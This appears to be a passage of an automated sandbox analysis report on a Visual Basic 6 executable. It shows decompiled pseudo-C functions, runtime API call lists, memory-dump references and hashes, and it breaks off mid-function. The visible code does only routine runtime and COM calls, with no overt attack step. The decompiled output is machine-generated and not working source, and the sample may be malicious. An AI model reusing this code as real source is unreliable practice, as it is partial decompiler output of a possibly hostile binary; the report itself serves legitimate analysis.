                                                          Function 02262CDC, Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b46e96eaf75a6dbacf6f0e25c3d67082073d3b3d496adb6670efdb000ff450f
                                                          • Instruction ID: 40909afcd2f3757ca6102023ab6677d9b326eb591502c6df386dfefef6edb488
                                                          • Opcode Fuzzy Hash: 7b46e96eaf75a6dbacf6f0e25c3d67082073d3b3d496adb6670efdb000ff450f
                                                          • Instruction Fuzzy Hash: 61B092B72015808FEF02CB08E4C2B8073A0FB15688B0804D0E402CB712C224E904CA00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02264B16, Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c31754d5eea248666da3b4950aeff2a6e78e2540fee9100b88c2985f49934c5b
                                                          • Instruction ID: 726b3c0842285bb83ef2639f963f4560c216000f3701b30e90ccd8ae6070aee0
                                                          • Opcode Fuzzy Hash: c31754d5eea248666da3b4950aeff2a6e78e2540fee9100b88c2985f49934c5b
                                                          • Instruction Fuzzy Hash: 97B09234211A408FCA41CA08C180F4073A0B705B60B010680E8208BBA1C364E800CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412F90, Relevance: 22.6, APIs: 15, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E00412F90(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				void* _v252;
				signed int _v256;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _t72;
				char* _t76;
				char* _t80;
				signed int _t84;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L00401210();
				_v16 = _t119;
				_v12 = 0x4011b8;
				_v8 = 0;
				_t72 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t116);
				L004012B2();
				_push(_v28);
				L004012A6();
				L00401306();
				_push(_t72);
				_push(0x404eac);
				L0040130C();
				asm("sbb eax, eax");
				_v252 =  ~( ~( ~_t72));
				L004012FA();
				_t76 = _v252;
				if(_t76 != 0) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x414010 != 0) {
						_v272 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x40509c);
						L004012EE();
						_v272 = 0x414010;
					}
					_t80 =  &_v40;
					L004012E8();
					_v252 = _t80;
					_t84 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t80,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x338))( *_v272));
					asm("fclex");
					_v256 = _t84;
					if(_v256 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x404e10);
						_push(_v252);
						_push(_v256);
						L00401324();
						_v276 = _t84;
					}
					_v268 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v268;
					_v56 = 8;
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L004012A0();
					L00401306();
					L004012E2();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t76 =  &_v56;
					_push(_t76);
					_push(7);
					L004012C4();
				}
				_push(0x4131fa);
				L004012FA();
				L004012FA();
				return _t76;
			}




































                                                          0x00412f93
                                                          0x00412fa2
                                                          0x00412fae
                                                          0x00412fb6
                                                          0x00412fb9
                                                          0x00412fc0
                                                          0x00412fcf
                                                          0x00412fda
                                                          0x00412fdf
                                                          0x00412fe2
                                                          0x00412fec
                                                          0x00412ff1
                                                          0x00412ff2
                                                          0x00412ff7
                                                          0x00412ffe
                                                          0x00413004
                                                          0x0041300e
                                                          0x00413013
                                                          0x0041301c
                                                          0x00413022
                                                          0x0041302c
                                                          0x00413036
                                                          0x0041303d
                                                          0x00413047
                                                          0x0041304e
                                                          0x00413055
                                                          0x0041305c
                                                          0x00413063
                                                          0x0041306a
                                                          0x00413071
                                                          0x00413078
                                                          0x00413086
                                                          0x004130a3
                                                          0x00413088
                                                          0x00413088
                                                          0x0041308d
                                                          0x00413092
                                                          0x00413097
                                                          0x00413097
                                                          0x004130c7
                                                          0x004130cb
                                                          0x004130d0
                                                          0x004130e8
                                                          0x004130eb
                                                          0x004130ed
                                                          0x004130fa
                                                          0x0041311c
                                                          0x004130fc
                                                          0x004130fc
                                                          0x004130fe
                                                          0x00413103
                                                          0x00413109
                                                          0x0041310f
                                                          0x00413114
                                                          0x00413114
                                                          0x00413126
                                                          0x0041312c
                                                          0x00413136
                                                          0x00413139
                                                          0x00413146
                                                          0x0041314d
                                                          0x00413151
                                                          0x00413155
                                                          0x00413159
                                                          0x0041315d
                                                          0x00413161
                                                          0x00413162
                                                          0x0041316c
                                                          0x00413174
                                                          0x0041317f
                                                          0x00413186
                                                          0x0041318a
                                                          0x0041318e
                                                          0x00413192
                                                          0x00413196
                                                          0x00413197
                                                          0x0041319a
                                                          0x0041319b
                                                          0x0041319d
                                                          0x004131a2
                                                          0x004131a5
                                                          0x004131ec
                                                          0x004131f4
                                                          0x004131f9

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412FAE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00412FDA
                                                          • #523.MSVBVM60(?,?,?,?,?,00401216), ref: 00412FE2
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,00401216), ref: 00412FEC
                                                          • __vbaStrCmp.MSVBVM60(00404EAC,00000000,?,?,?,?,?,00401216), ref: 00412FF7
                                                          • __vbaFreeStr.MSVBVM60(00404EAC,00000000,?,?,?,?,?,00401216), ref: 0041300E
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00413092
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004130CB
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000050), ref: 0041310F
                                                          • #596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00413162
                                                          • __vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041316C
                                                          • __vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00413174
                                                          • __vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041319D
                                                          • __vbaFreeStr.MSVBVM60(004131FA,00404EAC,00000000,?,?,?,?,?,00401216), ref: 004131EC
                                                          • __vbaFreeStr.MSVBVM60(004131FA,00404EAC,00000000,?,?,?,?,?,00401216), ref: 004131F4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$Move$#523#596CheckChkstkCopyHresultListNew2
                                                          • String ID:
                                                          • API String ID: 2450112860-0
                                                          • Opcode ID: 92f6e10e81c16aba57049d1ec6de858535d1e1c4dd2cf3980323215d76af670f
                                                          • Instruction ID: bac18de9e1071aa450ada95c5021e0d61ddcf409ca383f7aa42b3bb096d9387b
                                                          • Opcode Fuzzy Hash: 92f6e10e81c16aba57049d1ec6de858535d1e1c4dd2cf3980323215d76af670f
                                                          • Instruction Fuzzy Hash: D45109B1D4021DDBDB21DF91C985BDEB7B8FB08304F1081AAE109B7291DB795A85CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412D1D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E00412D1D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				signed int _v44;
				void* _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _t49;
				signed int _t54;
				signed int _t55;
				intOrPtr _t69;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_push(0x40);
				L00401210();
				_v12 = _t69;
				_v8 = 0x401198;
				L004012DC();
				if( *0x41446c != 0) {
					_v76 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e78);
					L004012EE();
					_v76 = 0x41446c;
				}
				_t7 =  &_v76; // 0x41446c
				_v52 =  *((intOrPtr*)( *_t7));
				_t49 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v48);
				asm("fclex");
				_v56 = _t49;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e68);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v80 = _t49;
				}
				_v60 = _v48;
				_t54 =  *((intOrPtr*)( *_v60 + 0xd0))(_v60,  &_v44);
				asm("fclex");
				_v64 = _t54;
				if(_v64 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x404e8c);
					_push(_v60);
					_push(_v64);
					L00401324();
					_v84 = _t54;
				}
				_t55 = _v44;
				_v72 = _t55;
				_v44 = _v44 & 0x00000000;
				L00401306();
				L004012E2();
				_push(0x412e41);
				L00401312();
				L004012FA();
				return _t55;
			}





















                                                          0x00412d22
                                                          0x00412d2d
                                                          0x00412d2e
                                                          0x00412d35
                                                          0x00412d38
                                                          0x00412d40
                                                          0x00412d43
                                                          0x00412d50
                                                          0x00412d5c
                                                          0x00412d76
                                                          0x00412d5e
                                                          0x00412d5e
                                                          0x00412d63
                                                          0x00412d68
                                                          0x00412d6d
                                                          0x00412d6d
                                                          0x00412d7d
                                                          0x00412d82
                                                          0x00412d91
                                                          0x00412d94
                                                          0x00412d96
                                                          0x00412d9d
                                                          0x00412db6
                                                          0x00412d9f
                                                          0x00412d9f
                                                          0x00412da1
                                                          0x00412da6
                                                          0x00412da9
                                                          0x00412dac
                                                          0x00412db1
                                                          0x00412db1
                                                          0x00412dbd
                                                          0x00412dcc
                                                          0x00412dd2
                                                          0x00412dd4
                                                          0x00412ddb
                                                          0x00412df7
                                                          0x00412ddd
                                                          0x00412ddd
                                                          0x00412de2
                                                          0x00412de7
                                                          0x00412dea
                                                          0x00412ded
                                                          0x00412df2
                                                          0x00412df2
                                                          0x00412dfb
                                                          0x00412dfe
                                                          0x00412e01
                                                          0x00412e0b
                                                          0x00412e13
                                                          0x00412e18
                                                          0x00412e33
                                                          0x00412e3b
                                                          0x00412e40

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412D38
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412D50
                                                          • __vbaNew2.MSVBVM60(00404E78,0041446C,?,?,?,?,00401216), ref: 00412D68
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E68,00000014), ref: 00412DAC
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E8C,000000D0), ref: 00412DED
                                                          • __vbaStrMove.MSVBVM60 ref: 00412E0B
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412E13
                                                          • __vbaFreeVar.MSVBVM60(00412E41), ref: 00412E33
                                                          • __vbaFreeStr.MSVBVM60(00412E41), ref: 00412E3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$CheckHresult$ChkstkMoveNew2
                                                          • String ID: lDA
                                                          • API String ID: 1876247458-725749841
                                                          • Opcode ID: 440021fa49a9ada312f3fbb17867931a06c51763d249e2a8f544f35775a34b1e
                                                          • Instruction ID: 6ccc7a7973848886fac6a3aa4c39348d345537c1c63772180a32be69ffdbe3cf
                                                          • Opcode Fuzzy Hash: 440021fa49a9ada312f3fbb17867931a06c51763d249e2a8f544f35775a34b1e
                                                          • Instruction Fuzzy Hash: 0F31F171D00208AFDB00EFE5D985BDDBBB4BF48314F20402AF501B62A1D7B85995DF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004134B3, Relevance: 16.6, APIs: 11, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E004134B3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16, void* _a32, void* _a64) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v68;
				char _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				char* _t35;
				signed int _t38;
				intOrPtr _t58;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_push(0x48);
				L00401210();
				_v12 = _t58;
				_v8 = 0x4011f0;
				L004012DC();
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v88 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v88 = 0x414010;
				}
				_t35 =  &_v72;
				L004012E8();
				_v76 = _t35;
				_t38 =  *((intOrPtr*)( *_v76 + 0x1bc))(_v76, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x370))( *_v88));
				asm("fclex");
				_v80 = _t38;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x404e10);
					_push(_v76);
					_push(_v80);
					L00401324();
					_v92 = _t38;
				}
				L004012E2();
				_push(0x4135b1);
				L00401312();
				L00401312();
				L00401312();
				return _t38;
			}
















                                                          0x004134b8
                                                          0x004134c3
                                                          0x004134c4
                                                          0x004134cb
                                                          0x004134ce
                                                          0x004134d6
                                                          0x004134d9
                                                          0x004134e6
                                                          0x004134f1
                                                          0x004134fc
                                                          0x00413508
                                                          0x00413522
                                                          0x0041350a
                                                          0x0041350a
                                                          0x0041350f
                                                          0x00413514
                                                          0x00413519
                                                          0x00413519
                                                          0x0041353d
                                                          0x00413541
                                                          0x00413546
                                                          0x00413551
                                                          0x00413557
                                                          0x00413559
                                                          0x00413560
                                                          0x0041357c
                                                          0x00413562
                                                          0x00413562
                                                          0x00413567
                                                          0x0041356c
                                                          0x0041356f
                                                          0x00413572
                                                          0x00413577
                                                          0x00413577
                                                          0x00413583
                                                          0x00413588
                                                          0x0041359b
                                                          0x004135a3
                                                          0x004135ab
                                                          0x004135b0

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 004134CE
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134E6
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134F1
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134FC
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 00413514
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413541
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001BC), ref: 00413572
                                                          • __vbaFreeObj.MSVBVM60 ref: 00413583
                                                          • __vbaFreeVar.MSVBVM60(004135B1), ref: 0041359B
                                                          • __vbaFreeVar.MSVBVM60(004135B1), ref: 004135A3
                                                          • __vbaFreeVar.MSVBVM60(004135B1), ref: 004135AB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$CheckChkstkHresultNew2
                                                          • String ID:
                                                          • API String ID: 1725699769-0
                                                          • Opcode ID: 5c04fc36b26f7fc7e2854b5de1476f9a651e3b938674d41ba79d4021456f4e63
                                                          • Instruction ID: c7df3774fd68d27fc73c4b8d11c19e04700fce7e7e68609c848668f9b9c0a55b
                                                          • Opcode Fuzzy Hash: 5c04fc36b26f7fc7e2854b5de1476f9a651e3b938674d41ba79d4021456f4e63
                                                          • Instruction Fuzzy Hash: 1D21F870900208EFCB14EFE2D885BDDBBB5BF48704F60446EE102B71A1DB786A45DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00413219, Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00413219(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v100;
				signed int _v104;
				char* _t45;
				signed int _t51;
				intOrPtr _t56;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L00401210();
				_v16 = _t71;
				_v12 = 0x4011d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x401216, _t68);
				L004012B2();
				if( *0x414010 != 0) {
					_v100 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v100 = 0x414010;
				}
				_t56 =  *((intOrPtr*)( *_v100));
				_t45 =  &_v32;
				L004012E8();
				_v84 = _t45;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 =  *0x4011c8;
				_t51 =  *((intOrPtr*)( *_v84 + 0x1b4))(_v84, _t56, 0x10, 0x10, 0x10, _t45,  *((intOrPtr*)(_t56 + 0x320))( *_v100));
				asm("fclex");
				_v88 = _t51;
				if(_v88 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x404e10);
					_push(_v84);
					_push(_v88);
					L00401324();
					_v104 = _t51;
				}
				L004012E2();
				asm("wait");
				_push(0x41336c);
				L004012FA();
				return _t51;
			}
























                                                          0x0041321c
                                                          0x0041322b
                                                          0x00413235
                                                          0x0041323d
                                                          0x00413240
                                                          0x00413247
                                                          0x00413256
                                                          0x0041325f
                                                          0x0041326b
                                                          0x00413285
                                                          0x0041326d
                                                          0x0041326d
                                                          0x00413272
                                                          0x00413277
                                                          0x0041327c
                                                          0x0041327c
                                                          0x00413296
                                                          0x004132a0
                                                          0x004132a4
                                                          0x004132a9
                                                          0x004132ac
                                                          0x004132b3
                                                          0x004132ba
                                                          0x004132c1
                                                          0x004132c8
                                                          0x004132cf
                                                          0x004132d9
                                                          0x004132e3
                                                          0x004132e4
                                                          0x004132e5
                                                          0x004132e6
                                                          0x004132ea
                                                          0x004132f4
                                                          0x004132f5
                                                          0x004132f6
                                                          0x004132f7
                                                          0x004132fb
                                                          0x00413305
                                                          0x00413306
                                                          0x00413307
                                                          0x00413308
                                                          0x00413310
                                                          0x0041331b
                                                          0x00413321
                                                          0x00413323
                                                          0x0041332a
                                                          0x00413346
                                                          0x0041332c
                                                          0x0041332c
                                                          0x00413331
                                                          0x00413336
                                                          0x00413339
                                                          0x0041333c
                                                          0x00413341
                                                          0x00413341
                                                          0x0041334d
                                                          0x00413352
                                                          0x00413353
                                                          0x00413366
                                                          0x0041336b

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00413235
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 0041325F
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 00413277
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004132A4
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132D9
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132EA
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132FB
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001B4,?,?,00000000), ref: 0041333C
                                                          • __vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0041334D
                                                          • __vbaFreeStr.MSVBVM60(0041336C,?,?,00000000), ref: 00413366
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Chkstk$Free$CheckCopyHresultNew2
                                                          • String ID:
                                                          • API String ID: 781568913-0
                                                          • Opcode ID: caa94b1251cc8d02b57cba123bd4565df6be7c679b114023dbf08dcc02f8f126
                                                          • Instruction ID: de420814f4b6a3ac0ccd1761ce5ea908fe343147f7a03237d8b9c78286086813
                                                          • Opcode Fuzzy Hash: caa94b1251cc8d02b57cba123bd4565df6be7c679b114023dbf08dcc02f8f126
                                                          • Instruction Fuzzy Hash: 584115B0940708DBCB00DFD5C889BDEBBB5BF49704F20846AF901BB2A1C7B95945CB48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412E54, Relevance: 15.1, APIs: 10, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E00412E54(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v96;
				signed int _v100;
				char* _t42;
				signed int _t46;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L00401210();
				_v16 = _t65;
				_v12 = 0x4011a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x401216, _t62);
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v96 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v96 = 0x414010;
				}
				_t42 =  &_v60;
				L004012E8();
				_v80 = _t42;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t46 =  *((intOrPtr*)( *_v80 + 0x1b0))(_v80, 0x10, _t42,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t46;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x404e10);
					_push(_v80);
					_push(_v84);
					L00401324();
					_v100 = _t46;
				}
				L004012E2();
				_push(0x412f71);
				L00401312();
				L00401312();
				return _t46;
			}




















                                                          0x00412e57
                                                          0x00412e66
                                                          0x00412e70
                                                          0x00412e78
                                                          0x00412e7b
                                                          0x00412e82
                                                          0x00412e91
                                                          0x00412e9a
                                                          0x00412ea5
                                                          0x00412eb1
                                                          0x00412ecb
                                                          0x00412eb3
                                                          0x00412eb3
                                                          0x00412eb8
                                                          0x00412ebd
                                                          0x00412ec2
                                                          0x00412ec2
                                                          0x00412ee6
                                                          0x00412eea
                                                          0x00412eef
                                                          0x00412ef2
                                                          0x00412ef9
                                                          0x00412f03
                                                          0x00412f0d
                                                          0x00412f0e
                                                          0x00412f0f
                                                          0x00412f10
                                                          0x00412f19
                                                          0x00412f1f
                                                          0x00412f21
                                                          0x00412f28
                                                          0x00412f44
                                                          0x00412f2a
                                                          0x00412f2a
                                                          0x00412f2f
                                                          0x00412f34
                                                          0x00412f37
                                                          0x00412f3a
                                                          0x00412f3f
                                                          0x00412f3f
                                                          0x00412f4b
                                                          0x00412f50
                                                          0x00412f63
                                                          0x00412f6b
                                                          0x00412f70

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412E70
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412E9A
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412EA5
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 00412EBD
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412EEA
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 00412F03
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001B0), ref: 00412F3A
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412F4B
                                                          • __vbaFreeVar.MSVBVM60(00412F71), ref: 00412F63
                                                          • __vbaFreeVar.MSVBVM60(00412F71), ref: 00412F6B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$Chkstk$CheckHresultNew2
                                                          • String ID:
                                                          • API String ID: 2096563423-0
                                                          • Opcode ID: 35e063b4805fc13de62935047456181e0e40f830049122385bce7bdc536905bb
                                                          • Instruction ID: 29eb19225dfe1db969045f7ea019cc03d86e4132ed1588bba4d8bad23aa60493
                                                          • Opcode Fuzzy Hash: 35e063b4805fc13de62935047456181e0e40f830049122385bce7bdc536905bb
                                                          • Instruction Fuzzy Hash: 47310470900208EFDB10EFE1C845BCDBBB5BF48704F10446AF501BB2A1C7B95996DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041338B, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0041338B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v60;
				char _v64;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v96;
				signed int _v100;
				char* _t36;
				signed int _t40;
				intOrPtr _t59;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_push(0x50);
				L00401210();
				_v12 = _t59;
				_v8 = 0x4011e0;
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v96 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v96 = 0x414010;
				}
				_t36 =  &_v64;
				L004012E8();
				_v84 = _t36;
				_v72 = _v72 & 0x00000000;
				_v80 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t40 =  *((intOrPtr*)( *_v84 + 0x1b8))(_v84, 0x10, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x368))( *_v96));
				asm("fclex");
				_v88 = _t40;
				if(_v88 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x404e10);
